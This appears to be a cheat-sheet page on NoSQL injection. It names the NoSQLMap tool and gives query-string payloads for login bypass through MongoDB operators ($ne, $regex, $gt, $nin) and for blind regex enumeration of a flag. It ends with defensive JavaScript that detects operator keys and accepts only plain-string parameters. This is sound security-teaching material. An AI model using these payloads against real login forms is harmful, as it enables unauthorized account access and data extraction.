
NOSQL injections

NoSQLMap https://github.com/codingo/NoSQLMap

1-Set options (do this first)
2-NoSQL DB Access Attacks
3-NoSQL Web App attacks
4-Scan for Anonymous MongoDB Access
x-Exit

Basic Authentication

index.php?login[$regex]=a.*&pass[$ne]=lol
index.php?login[$gt]=admin&login[$lt]=test&pass[$ne]=1

Basic NoSQL Injection

http://url?login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto

Blind NoSQL Injection

Get size

index.php?chall_name=nosqlblind&flag[$regex]=.1

Enumeration

index.php?chall_name=nosqlblind&flag[$regex]=3a.20
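
The defender's view of the query strings above, as an added example that is not part of the original page: a PHP- or qs-style bracket parser turns each one into a nested object whose `$`-prefixed keys reach the database as operators, and the check below rejects them before a filter is built. The function names are hypothetical, and the assumption is a backend that passes parsed parameters straight into a MongoDB filter.

```javascript
// Added example; helper names are hypothetical, inputs are the page's query strings.
// Parse "a[b][]=c" keys into nested objects, as PHP and Express's extended parser do.
function parseBracketQuery(query) {
  const out = Object.create(null); // no prototype, so "__proto__" is just a key
  for (const [rawKey, value] of new URLSearchParams(query)) {
    const head = rawKey.split("[")[0];
    const path = [head, ...[...rawKey.matchAll(/\[([^\]]*)\]/g)].map((m) => m[1])];
    let node = out;
    for (let i = 0; i < path.length; i++) {
      const seg = path[i], next = path[i + 1];
      if (next === undefined) {
        node[seg] = value;                       // plain scalar: login=alice
      } else if (next === "") {                  // trailing "[]" appends to a list
        if (!Array.isArray(node[seg])) node[seg] = [];
        node[seg].push(value);
        break;
      } else {                                   // "[name]" descends one level
        if (node[seg] === null || typeof node[seg] !== "object") {
          node[seg] = Object.create(null);
        }
        node = node[seg];
      }
    }
  }
  return out;
}

// Return the dotted path of every key that MongoDB would read as an operator.
function findOperatorKeys(value, path = "") {
  if (value === null || typeof value !== "object") return [];
  return Object.entries(value).flatMap(([key, child]) => {
    const here = path ? `${path}.${key}` : key;
    return (key.startsWith("$") ? [here] : []).concat(findOperatorKeys(child, here));
  });
}

// Hardened accessor: credential fields must be plain strings, never objects.
function scalarParam(params, name) {
  const v = params[name];
  if (typeof v !== "string") throw new TypeError(`${name} must be a plain string`);
  return v;
}

// Convenience wrapper for log review or a request filter.
function auditQuery(query) {
  return findOperatorKeys(parseBracketQuery(query));
}
```

Building the filter only from `scalarParam()` results keeps every comparison an equality match, whatever the client sends.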
